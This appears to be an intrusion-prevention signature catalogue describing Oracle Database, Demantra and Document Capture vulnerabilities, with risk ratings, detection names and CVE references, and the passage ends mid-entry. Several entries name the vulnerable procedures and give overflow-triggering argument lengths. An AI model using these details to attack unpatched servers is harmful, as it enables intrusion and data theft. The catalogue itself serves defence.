sgpkg-ips-119-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle 9i;Oracle 8i

Type:

Buffer Overflow

Description:

Certain versions of Oracle Database server suffer from a vulnerability where supplying an overly long username when logging onto the database server will cause a buffer overflow. To exploit the vulnerability a suitable database client that does not truncate usernames is required. A successful exploit does allows remote attackers to execute arbitrary code on the server.

Situation:

TNS_CS-Oracle-Database-Server-Authentication-Username-Buffer-Overflow

References:

CVE-2003-0095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0095

BID-6849
http://www.securityfocus.com/bid/6849

OSVDB-6319
http://www.osvdb.org/6319

Oracle-Database-Server-CREATE_TABLES-SQL-Injection

About this vulnerability:

SQL injection vulnerability in the Oracle Database Server package CTXSYS.DRVXTABC

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Database

Type:

Input Validation

Description:

There is an SQL injection vulnerability in the Oracle Database Server package CTXSYS.DRVXTABC. A remote attacker with Execute privileges for the ctxsys.drvxtabc package can exploit this vulnerability to inject and execute malicious SQL commands on the target system. As a result, an attacker may disclose sensitive data and compromise data integrity.

Situation:

Generic_Oracle-Database-Server-CREATE-TABLES-SQL-Injection
TNS_Oracle-Database-Server-CREATE-TABLES-SQL-Injection

References:

CVE-2009-1991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1991

BID-36748
http://www.securityfocus.com/bid/36748

OSVDB-59113
http://www.osvdb.org/59113

Oracle-Database-Server-ctxsys.driload-Access-Violation

About this vulnerability:	A vulnerability in Oracle Database Server
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Database
Type:	Malfunction
Description:	There exists an access validation vulnerability with Oracle database server. There is an Oracle package, which is available to any database user, that allows the execution of SQL queries with database administration privileges. An authenticated attacker may exploit this issue to gain database administrator privileges and execute arbitrary SQL queries on the vulnerable product.
Situation:	TNS_Oracle-Oracle-Database-Server-ctxsys.driload-Access-Violation

Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Oracle Database Server

Risk:

High

First detected in:

sgpkg-ips-173-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Oracle Database Server DBMS_AQELM package. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted SQL statement to the target server. A successful exploitation allows arbitrary code injection and execution with the privileges of the server process, System by default on Windows systems.

Situation:

Generic_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow
TNS_Oracle-Database-Server-DBMS-AQELM-Package-Buffer-Overflow

References:

CVE-2008-2607
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2607

BID-30177
http://www.securityfocus.com/bid/30177

OSVDB-47727
http://www.osvdb.org/47727

Oracle-Database-Server-DBMS-CDC-PUBLISH-SQL-Injection

About this vulnerability:

A vulnerability in Oracle Database 9i Release 2

Risk:

High

First detected in:

sgpkg-ips-303-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i

Type:

Input Validation

Description:

There is an SQL injection vulnerability in Oracle Database Server 9i Release 2. The vulnerability is due to input validation errors in the DROP_CHANGE_SOURCE and ALTER_CHANGE_SOURCE procedures of the DBMS_CDC_PUBLISH package. Remote authenticated attackers with EXECUTE permission on the SYS.DBMS_CDC_PUBLISH package can exploit this vulnerability by sending a specially crafted parameter to the affected procedures. Successful exploitation can result in disclosure of information, and modification or manipulation of the data in the underlying database.

Situation:

Generic_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection
TNS_CS-Oracle-Database-Server-DBMS-DCD-PUBLISH-SQL-Injection

References:

CVE-2010-0870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0870

BID-39422
http://www.securityfocus.com/bid/39422

Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection

About this vulnerability:

Oracle Database Server DBMS_CDC_SUBSCRIBE package SQL injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g

Type:

SQL Injection

Description:

Oracle Database Server suffers from an SQL injection vulnerability. The DBMS_CDC_SUBSCRIBE package does not parse input correctly, allowing a crafted function call to execute arbitrary SQL commands as the SYS user. The SYS user has the highest privilege level. The vulnerability can be used by a user with execution privileges to the DBMS_CDC_SUBSCRIBE or the DBMS_CDC_ISUBSCRIBE package to execute SQL commands with DBA privileges.

Situation:

Generic_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection
TNS_Oracle-Database-Server-DBMS-CDC-Subscribe-Package-SQL-Injection

References:

CVE-2005-1197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1197

BID-13236
http://www.securityfocus.com/bid/13236

Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-599-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database Server

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in Oracle Database Server. The vulnerability is due to insufficient validation of the XML element tag name when a malicious QNAME in a PL/SQL query is encountered. A remote authenticated attacker could exploit this vulnerability by sending a malicious SELECT query to the server. Successful exploitation can allow an attacker to execute arbitrary code on the target system.

Situation:

TNS_CS-Oracle-Database-Server-Lpxfsmsax-Qname-Stack-Buffer-Overflow

References:

CVE-2013-3751
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3751

OSVDB-95264
http://www.osvdb.org/95264

Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection

About this vulnerability:

SQL injection vulnerability in the Oracle Workspace Manager component

Risk:

High

First detected in:

sgpkg-ips-263-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Oracle Database

Type:

Input Validation

Description:

There is an SQL injection vulnerability in the Oracle Workspace Manager component. A remote attacker with limited privileges to create PL/SQL functions can exploit this vulnerability to inject and execute privileged SQL statements, compromising the database server.

Situation:

Generic_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection
TNS_Oracle-Database-Server-LT.ROLLBACKWORKSPACE-SQL-Injection

References:

CVE-2009-0978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0978

BID-34461
http://www.securityfocus.com/bid/34461

OSVDB-53734
http://www.osvdb.org/53734

Oracle-Database-Server-MD2-Package-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database Server

Type:

Input Validation

Description:

There is an input validation vulnerability within a package included with Oracle database server. The multidimensional package provides a function that allows for a stack buffer overflow when an overly long string is passed as a parameter. An authenticated attacker may exploit this issue to execute arbitrary code with permission of Oracle database process, or cause a denial of service. In case of a simple attack against this vulnerability, the Oracle database process will disconnect the attacking client and continue to operate normally or the server process will terminate, causing a denial of service. The behaviour of the target in simple attack case will depend on the length of the string passed to the vulnerable function. For Oracle 9i, a string length equal to or greater than 4241 bytes will lead to the termination of the Oracle server causing a global denial of service condition. A string length less than 4241 bytes but equal to or greater than 3962 will lead to the termination of the current connection. A string length less than 3962 will generate a PL/SQL error message. For Oracle 10g, a string length equal to or greater than 173 bytes will lead to the termination of the Oracle server causing a global denial of service condition. A string length less than 173 bytes but equal to or greater than 140 will lead to the termination of the current connection. A string length less than 140 will generate a PL/SQL error message. (Please refer to section 4.1 and 4.2) In case of a more sophisticated attack, arbitrary code may be executed. In this case the behaviour of the attacked target will depend on the nature of the injected code. It is difficult for an attacker to execute code using this vulnerability. Since the attacker must take care to preserve numerous stack values in order to avoid causing error conditions, it would require a sophisticated exploit to inject code and take control of the Oracle server process.

Situation:

TNS_Oracle-Database-Server-MD2-Package-Buffer-Overflow

References:

CVE-2004-1774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1774

BID-13145
http://www.securityfocus.com/bid/13145

Oracle-Database-Server-MD2-SDO-Code-Size-BOF

About this vulnerability:	A vulnerability in Oracle Database Server
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Database
Type:	Buffer Overflow
Description:	There exists an input validation vulnerability within a package included with Oracle database server. The multidimensional package provides a function that allows for a stack buffer overflow when an overly long string is passed as a parameter. An authenticated attacker may exploit this issue to execute arbitrary code with permission of Oracle database process, or cause a denial of service.
Situation:	Generic_CS-Oracle-Database-Server-MD2-SDO-Code-Size-BOF

Oracle-Database-Server-MD2-Validate-Geom-BOF

About this vulnerability:	A vulnerability in Oracle Database Server
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Database
Type:	Buffer Overflow
Description:	An input validation vulnerability exists within a package included with the Oracle database server. The multidimensional package provides a function that allows for a stack buffer overflow when an overly long string is passed as a parameter. An authenticated attacker may exploit this issue to execute arbitrary code with permission of Oracle database process, or cause a denial of service condition.
Situation:	Generic_CS-Oracle-Database-Server-MD2-Validate-Geom-BOF

Oracle-Database-Server-SDO_CS-TRANSFORM_LAYER-Buffer-Overflow

About this vulnerability:

Oracle database server SDO_CS.TRANSFORM_LAYER buffer overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 8i; Oracle 9i; Oracle 10g

Type:

Buffer Overflow

Description:

Oracle Database Server suffers from a buffer overflow vulnerability in Oracle Spatial. Oracle Spatial's MDSYS schema contains a package called SDO_CS, whose TRANSFORM_LAYER function cannot handle a large third argument. An argument of over 460 bytes will result in a stack-based buffer overflow, potentially allowing arbitrary code execution with system privileges. An attacker needs execution privileges on the MDSYS.SDO_CS package to exploit this vulnerability.

Situation:

Generic_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow
TNS_Oracle-Database-Server-SDO-CS-TRANSFORM-LAYER-Buffer-Overflow

References:

CVE-2006-5344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5344

BID-20588
http://www.securityfocus.com/bid/20588

Oracle-Database-Server-SQL-Query-Directory-Traversal

About this vulnerability:

Directory traversal vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 8i; Oracle 9i

Type:

Directory Traversal

Description:

Oracle Database Server has a directory traversal vulnerability. Insufficient input validation of the file name argument passed to the UTL_FILE function allows an authenticated remote attacker to read, rename, write into, and remove arbitrary files, including those in the Startup folder, on the target file system.

Situation:

SMB-TCP_Oracle-Database-Server-SQL-Query-Directory-Traversal
Generic_Oracle-Database-Server-SQL-Query-Directory-Traversal
TNS_Oracle-Database-Server-SQL-Query-Directory-Traversal

References:

CVE-2005-0701
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0701

BID-12749
http://www.securityfocus.com/bid/12749

OSVDB-14631
http://www.osvdb.org/14631

Oracle-Database-Server-String-Conversion-Function-BOF

About this vulnerability:	A vulnerability in Oracle Database Server
Risk:	High
First detected in:	sgpkg-ips-409-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Oracle Database
Type:	Buffer Overflow
Description:	There exists an input validation vulnerability with Oracle database server. Oracle database server provides a string conversion function that allows for a stack buffer overflow when certain values are converted to a string representation. An authenticated attacker may exploit this issue to execute an arbitrary code with permission of Oracle database process or cause a denial of service.
Situation:	TNS_Oracle-Oracle-Database-Server-String-Conversion-Function-BOF

Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection

About this vulnerability:

Oracle Database Server SYS.DBMS_METADATA_UTIL SQL injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-57-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g; Oracle 9i

Type:

SQL Injection

Description:

Oracle Database Server's functionality can be extended via extra packages. Numerous packages are intended for internal use only, but can be invoked by users like normal user-accessible packages. The internal package SYS.DBMS_METADATA_UTIL contains four procedures that have SQL injection vulnerabilities. It is possible to include SQL statements into the second and third argument of these procedures, and to get these statements executed in the context of the SYS user.

Situation:

Generic_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection
TNS_Oracle-Database-Server-Sys-DBMS-Metadata-Util-SQL-Injection

References:

CVE-2006-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0260

BID-16287
http://www.securityfocus.com/bid/16287

OSVDB-22637
http://www.osvdb.org/22637

OSVDB-22643
http://www.osvdb.org/22643

OSVDB-22543
http://www.osvdb.org/22543

Oracle-Database-Server-Sys-KUPV-SQL-Injection

About this vulnerability:

Oracle Database Server SYS.KUPV SQL injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-56-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g

Type:

SQL Injection

Description:

Oracle Database Server's functionality can be extended via extra packages. Numerous packages are intended for internal use only, but can be invoked by users like normal user-accessible packages. The internal package KUPV$FT contains three procedures that have SQL injection vulnerabilities, accessible to users with the database role EXECUTE_CATALOG_ROLE. It is possible to include SQL statements in the arguments to these procedures by surrounding the SQL statement in extra quotes and using the concatenation operator.

Situation:

Generic_Oracle-Database-Server-Sys-KUPV-SQL-Injection
TNS_Oracle-Database-Server-Sys-KUPV-SQL-Injection

References:

BID-16287
http://www.securityfocus.com/bid/16287

Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection

About this vulnerability:

Oracle Database Server Workspace Manager SQL injection

Risk:

Low

First detected in:

sgpkg-ips-229-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i; Oracle 10g; Oracle 11g

Type:

Input Validation

Description:

There are multiple SQL injection vulnerabilities in the Oracle Database Server product. The vulnerabilities are due to insufficient sanitization of input parameters in the Oracle Workspace Manager component. A remote attacker with valid user credentials may leverage these vulnerabilities to inject and execute SQL code with escalated privileges of the SYS or WMSYS account. Successful exploitation can result in disclosure of sensitive information, and modification or manipulation of the data in the underlying database.

Situation:

Generic_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection
TNS_CS-Oracle-Database-Server-Workspace-Manager-Multiple-SQL-Injection

References:

CVE-2008-3982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3982

BID-31683
http://www.securityfocus.com/bid/31683

Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database Server; Oracle Application Server

Type:

Input Validation

Description:

There exists an SQL injection vulnerability in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to procedures PITRIG_TRUNCATE and PITRIG_DROP in XDB.XDB_PITRIG_PKG package. A remote attacker with valid user credentials may leverage this vulnerability to inject and execute arbitrary SQL code within the security context of the database system administrator. Exploitation of this vulnerability may result in privilege escalation allowing an attacker with limited privileges to execute statements with the privileges of the database system administrator. The exact behaviour of the target system is dependent on the intention of the attacker. It may be possible for an attacker to affect the target host beyond the confines of the database which would allow manipulation of the host system.

Situation:

TNS_CS-Oracle-Database-Server-XDB-Pitrig-Procedures-SQL-Injection

References:

BID-27229
http://www.securityfocus.com/bid/27229

Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

Moderate

First detected in:

sgpkg-ips-1244-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database Server

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the Oracle Database Server product. The vulnerability exists due to insufficient validation of the arguments supplied to DBMS_XMLSCHEMA packages. A remote attacker with valid user credentials may use this vulnerability to execute arbitrary code with privileges of the database server process. In case the attack is aiming at a denial of service attack, the vulnerable Oracle database server process will terminate, and the database service will no longer be available until it is restarted. It is also possible that the database data will be corrupted during the database server termination. In case the attacker has successfully injected and executed malicious code on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the Oracle database server process. On Windows systems, the Oracle database server process runs as the System user.

Situation:

TNS_Oracle-Oracle-Database-Server-Xdb.dbms_xmlschema-Buffer-Overflow

References:

CVE-2006-0272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0272

Oracle-Database-Server_DBMS-Metadata-Package-SQL-Injection

About this vulnerability:

Oracle Database Server DBMS_METADATA package SQL injection vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i; Oracle 10g

Type:

SQL Injection

Description:

Oracle Database Server suffers from an SQL injection vulnerability. The DBMS_METADATA package does not parse input correctly, allowing a crafted function call to execute arbitrary SQL commands as the SYS user. The SYS user has the highest privilege level. The vulnerability can be used by a user with execution privilege to the DBMS_METADATA package to execute SQL commands with DBA privileges.

Situation:

Generic_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection
TNS_Oracle-Database-Server-DBMS-Metadata-Package-SQL-Injection

References:

BID-13238
http://www.securityfocus.com/bid/13238

Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass

About this vulnerability:

A vulnerability in Oracle Database

Risk:

Low

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

Malfunction

Description:

There is a security bypass vulnerability in Oracle Database Server. The flaw is due to improper enforcement of user permissions on data access to tables through certain types of views. A remote authenticated attacker may use this vulnerability to perform UPDATE, DELETE and INSERT operations without having proper privileges.

Situation:

Generic_Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass
TNS_CS-Oracle-Database-SQL-Compiler-Access-Control-Security-Bypass

References:

CVE-2007-3855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3855

BID-24887
http://www.securityfocus.com/bid/24887

Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the 'sys.pbsde.init' stored procedure in Oracle database

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 9i; Oracle 10g

Type:

Buffer Overflow

Description:

The default installation of Oracle database contains some stored procedures. One of these procedures is 'sys.pdsde.init'. Although this procedure is not accessible to regular database users, they may still attempt to invoke it. This procedure has a buffer overflow vulnerability in the processing of its parameters. If the third parameter to this procedure is longer than 110 bytes, a stack buffer overflow occurs. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim server.

Situation:

Generic_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow
TNS_Oracle-Database-Sys-Pbsde-Init-Procedure-Buffer-Overflow

References:

CVE-2005-0873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0873

BID-15134
http://www.securityfocus.com/bid/15134

Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection

About this vulnerability:

SQL injection vulnerability in the Oracle Database Server SYS.KUPW$WORKER package

Risk:

High

First detected in:

sgpkg-ips-88-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

SQL Injection

Description:

Oracle Database Server SYS.KUPW$WORKER package has an SQL injection vulnerability. By calling the vulnerable SYS.KUPW$WORKER.MAIN procedure, a remote attacker with limited privileges can inject arbitary SQL statements that are executed with the context of the database administrator, SYSDBA.

Situation:

SMB-TCP_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
Generic_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection
TNS_CS_Oracle-Database-SYS.KUPW-WORKER-Package-MAIN-Procedure-SQL-Injection

References:

CVE-2006-3698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3698

BID-19054
http://www.securityfocus.com/bid/19054

Oracle-Database-Sys.lt.findricset-SQL-Injection

About this vulnerability:

A vulnerability in Oracle Database Server

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database Server

Type:

Malfunction

Description:

There exists a SQL injection vulnerability in Oracle Database.

Situation:

TNS_CS-Oracle-Database-Sys.lt.findricset-SQL-Injection

References:

CVE-2007-5511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5511

BID-26098
http://www.securityfocus.com/bid/26098

OSVDB-40079
http://www.osvdb.org/40079

Oracle-Database-SYS.OLAPIMPL_T-Package-ODCITABLESTART-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Oracle Database

Risk:

High

First detected in:

sgpkg-ips-204-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Database

Type:

Buffer Overflow

Description:

There is a buffer overflow in the Oracle Database Server. The vulnerability is due to improper input validation of user-provided parameters sent to a procedure in the SYS.OLAPIMPL_T package. A remote authenticated attacker can exploit this vulnerability by sending a specially crafted SQL statement to the target server, potentially causing database corruption or arbitrary code injection and execution with the privileges of the affected process.

Situation:

Generic_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow
TNS_CS-Oracle-Database-SYS.OLAPIMPL-T-Package-ODCITABLESTART-Buffer-Overflow

References:

CVE-2008-3974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3974

BID-33177
http://www.securityfocus.com/bid/33177

OSVDB-51347
http://www.osvdb.org/51347

Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication

About this vulnerability:

A vulnerability in Oracle Database 10g Release 2

Risk:

Moderate

First detected in:

sgpkg-ips-453-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g; Oracle 11g

Type:

Malfunction

Description:

A vulnerability has been discovered in the TNS Listener component of Oracle's database. The vulnerability is due to a lack of authentication when accepting registrations of database server instances. A remote attacker could use this vulnerability to redirect legitimate database queries to a rogue server or to perform a man-in-the-middle attack to hijack established connections. As a result, the attacker could gain full access to the database with the privileges of the user whose connection was hijacked.

Situation:

Generic_CS-Oracle-Database-TNS-Listener-Registration-Lack-Of-Authentication
TNS_Oracle-Database-TNS-Listener-Service-Registration-Lack-Of-Authentication

References:

CVE-2012-1675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1675

BID-53308
http://www.securityfocus.com/bid/53308

Oracle-Database-Trigger-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability

About this vulnerability:

A vulnerability in Oracle Oracle Database

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g

Type:

SQL Injection

Description:

There is an SQL injection vulnerability in Oracle Database Server product. The vulnerability exists due to insufficient validation of arguments supplied to trigger MDSYS.SDO_TOPO_DROP_FTBL. A remote attacker with valid user credentials may leverage this vulnerability to inject and execute arbitrary SQL code within the security context of the database system administrator. Exploitation of this vulnerability may result in privilege escalation allowing an attacker with limited privileges to execute statements with the privileges of the database system administrator. The exact behaviour of the target system is dependent on the intention of the attacker. It may be possible for an attacker to affect the target host beyond the confines of the database which would allow manipulation of the host system.

Situation:

TNS_CS-Oracle-Database-Mdsys.sdo_Topo_Drop_ftbl-SQL-Injection-Vulnerability

References:

CVE-2008-3979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3979

BID-33177
http://www.securityfocus.com/bid/33177

OSVDB-51354
http://www.osvdb.org/51354

Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF

About this vulnerability:

A buffer overflow vulnerability in Oracle Database Server

Risk:

High

First detected in:

sgpkg-ips-130-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle 10g

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Oracle Database Server. The vulnerability exists due to insufficient validation of the arguments supplied to procedure PITRIG_DROPMETADATA in XDB.XDB_PITRIG_PKG package. A remote attacker with valid user credentials may leverage this vulnerability to execute arbitrary code within the security context of the affected service.

Situation:

Generic_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF
TNS_CS-Oracle-Database-XDB-Pitrig-dropmetadata-Procedure-BOF

References:

CVE-2007-4517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4517

BID-26374
http://www.securityfocus.com/bid/26374

Oracle-Demantra-Demand-Management-File-Download

About this vulnerability:

An Oracle Demantra Demand Management File Download vulnerability.

Risk:

High

First detected in:

sgpkg-ips-704-5211

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

Oracle Demantra Demand Management

Type:

Configuration Error

Description:

A vulnerability in Oracle Demantra Demand Management, versions 12.2.0, 12.2.1, and 12.2.2, which allows remote attackers to perform directory traversal and download arbitrary files due to a broken authentication filter.

Situation:

HTTP_CSU-Oracle-Demantra-Demand-Management-Information-Leak

References:

CVE-2013-5880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5880

BID-64836
http://www.securityfocus.com/bid/64836

OSVDB-102095
http://www.osvdb.org/102095

Oracle-Demantra-Demand-Management-Information-Leak

About this vulnerability:

A Oracle Demantra Demand Management Information Leak vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Demantra Demand Management

Type:

Directory Traversal

Description:

A vulnerability in the Oracle Demantra Demand Management component, versions 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2, 12.2.3, allows remote attackers to obtain sensitive information about the system. This covers both CVE-2013-5795 and CVE-2013-5877.

Situation:

HTTP_CSU-Oracle-Demantra-Demand-Management-Information-Leak

References:

CVE-2013-5795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5795

BID-64846
http://www.securityfocus.com/bid/64846

OSVDB-102096
http://www.osvdb.org/102096

Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Document Capture

Risk:

High

First detected in:

sgpkg-ips-527-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Document Capture

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the BlackIceDevMode.ocx ActiveX control included with Oracle Document Capture. The vulnerability is due to improper bounds checking while parsing the arguments passed to the SetAnnotationFont() method. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could lead to injection and execution of arbitrary code on the target system with the privileges of the logged in user.

Situation:

File-Text_Oracle-Document-Capture-ActiveX-Control-SetAnnotationFont-Usage

References:

CVE-2013-1516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1516

OSVDB-92387
http://www.osvdb.org/92387

Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow

About this vulnerability:

A vulnerability in Oracle Document Capture

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle Document Capture

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in NCSECWLib ActiveX control component included with Oracle Document Capture. The vulnerability is due to a improper bounds ochecking of arguments within the object's WriteJPG method. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page. Successful exploitation could lead to injection and execution of arbitrary code on the target system with the privileges of the logged in user.

Situation:

HTTP_SS-Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow
File-Text_Oracle-Document-Capture-ActiveX-Control-WriteJPG-Buffer-Overflow

References:

CVE-2010-3599
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3599

BID-45856
http://www.securityfocus.com/bid/45856

Oracle-Document-Capture-EasyMail-ActiveX-Control

About this vulnerability:

A vulnerability in Oracle Document Capture

Risk:

Moderate

First detected in:

sgpkg-ips-375-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Oracle Document Capture

Type:

Malfunction

Description:

An information disclosure vulnerability exists in the EasyMail ActiveX control included with Oracle Document Capture. The vulnerability is due to improper validation of user input within the ImportBodyTextEx(), ImportBodyText() and ImportBodyTextAlternative() methods, allowing an attacker to read any file in the affected system. Remote unauthenticated attackers can exploit this vulnerability by enticing target users to visit a malicious web page.

Situation:

HTTP_SS-Oracle-Document-Capture-EasyMail-ActiveX-Control
File-Text_Oracle-Document-Capture-EasyMail-ActiveX-Control

References:

CVE-2010-3595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3595

BID-45849
http://www.securityfocus.com/bid/45849

Oracle-Document-Capture-EasyMail-IMAP4-LicenseKey-Buffer-Overflow

About this vulnerability:	A buffer overflow vulnerability in Oracle Document Capture integrated with the Oracle Imaging and Process Management and Oracle Universal Content Management products
Risk:	Moderate
First detected in:	sgpkg-ips-268-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Oracle Document Capture; QuikSoft Corp EasyMail
Type:	Buffer Overflow
Description:	There is a buffer overflow vulnerability in Oracle Document Capture integrated with the Oracle Imaging and Process Management and Oracle Universal Content Management products.
